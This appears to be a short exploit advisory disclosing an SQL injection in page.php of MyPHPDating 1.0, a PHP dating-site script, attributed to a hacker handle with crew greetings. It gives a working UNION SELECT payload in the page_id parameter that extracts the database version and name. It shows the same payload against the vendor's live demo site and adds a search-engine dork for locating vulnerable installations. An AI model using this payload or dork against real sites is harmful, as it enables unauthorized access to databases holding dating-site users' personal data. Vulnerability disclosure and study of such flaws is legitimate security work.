=================================================================================================================================


  [o] MyPHPDating 1.0 SQL Injection Vulnerability

       Software : MyPHPDating version 1.0
       Vendor   : http://www.phponlinedatingsoftware.com/
       Demo     : http://www.phponlinedatingsoftware.com/demo.htm
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


=================================================================================================================================


  [o] Description

       MyPHPDating 1.0 is a full-featured version of our online dating / Matchmaking software.
       It combines all the features of any standard online dating / Matchmaking website plus much more features,
       that make your dating website very powerful and easy to use.



  [o] Vulnerable file

       page.php



  [o] Exploit

       http://localhost/[path]/page.php?page_id=[SQL]
       http://localhost/[path]/page.php?page_id=-1+union+select+1,2,3,concat(@@version,0x3c3e,database())--



  [o] Proof of concept [demo]

       http://www.phponlinedatingsoftware.com/demo/page.php?page_id=-1+union+select+1,2,3,concat(@@version,0x3c3e,database())--



  [o] Dork

       "Powered by MyPHPDating"


=================================================================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://serverisdown.org/news ]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
       H312Y yooogy mousekill }^-^{ loqsa zxvf martfella
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

        
=================================================================================================================================